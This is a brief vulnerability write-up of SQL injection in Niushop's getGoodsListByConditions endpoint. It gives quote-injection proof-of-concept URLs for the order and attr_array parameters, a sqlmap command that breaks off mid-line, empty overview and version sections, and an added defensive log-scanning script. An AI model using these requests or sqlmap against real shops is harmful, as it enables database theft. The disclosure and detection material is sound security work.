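Niushop SQL injection
=====================
I. Vulnerability overview
-------------------------
II. Affected versions
---------------------
III. Reproduction steps
-----------------------
### SQL injection (1)
#### order parameter: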
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7%27&attr_array[][2]=8&spec_array[]=9
#### attr\_array parameter:
http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8%27&spec_array[]=9
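For defenders, the two requests above can be hunted for in web access logs. The following is an added example, not code from the original page or from Niushop: it flags requests to this endpoint whose `order` or `attr_array` values fall outside an allowlist. The allowlist pattern, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

ENDPOINT = "/wap/goods/getgoodslistbyconditions"
# Parameters the page shows as injectable: order and attr_array[...][...].
WATCHED = re.compile(r"order|attr_array(\[[^\]]*\])*")
# Assumption: legitimate values are short identifiers, numbers or sort keywords.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_ ,.-]{0,64}")
# Assumed common/combined log format: client IP first, request line in quotes.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not taken from the page.
BASE = "/index.php/wap/goods/getGoodsListByConditions?category_id=1&page=5"
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}&order=7&attr_array[][2]=8 HTTP/1.1" 200 512',
    f'203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET {BASE}&order=7%27&attr_array[][2]=8 HTTP/1.1" 500 87',
    f'203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET {BASE}&order=7&attr_array%5B%5D%5B2%5D=8%27 HTTP/1.1" 500 87',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php/wap/index?q=o%27brien HTTP/1.1" 200 300',
]

def suspicious_params(url):
    """Return sorted names of watched parameters whose decoded value is not allowlisted."""
    parts = urlsplit(url)
    if ENDPOINT not in parts.path.lower():
        return []  # only this endpoint is in scope
    flagged = set()
    # parse_qsl percent-decodes names and values, so %27 and %5B%5D are normalised.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if WATCHED.fullmatch(name) and not SAFE_VALUE.fullmatch(value):
            flagged.add(name)
    return sorted(flagged)

def scan(lines):
    """Return (client_ip, flagged_params) for every log line that trips the check."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            flagged = suspicious_params(m.group(2))
            if flagged:
                hits.append((m.group(1), flagged))
    return hits

if __name__ == "__main__":
    for ip, flagged in scan(SAMPLE_LOG):
        print(ip, flagged)
```

The same allowlist idea applies on the server side: rejecting any `order` or `attr_array` value that is not an expected sort key or attribute id before it reaches the query removes the injection point rather than only detecting probes.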
#### Run sqlmap directly
sqlmap -u "http://0-sec.org/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec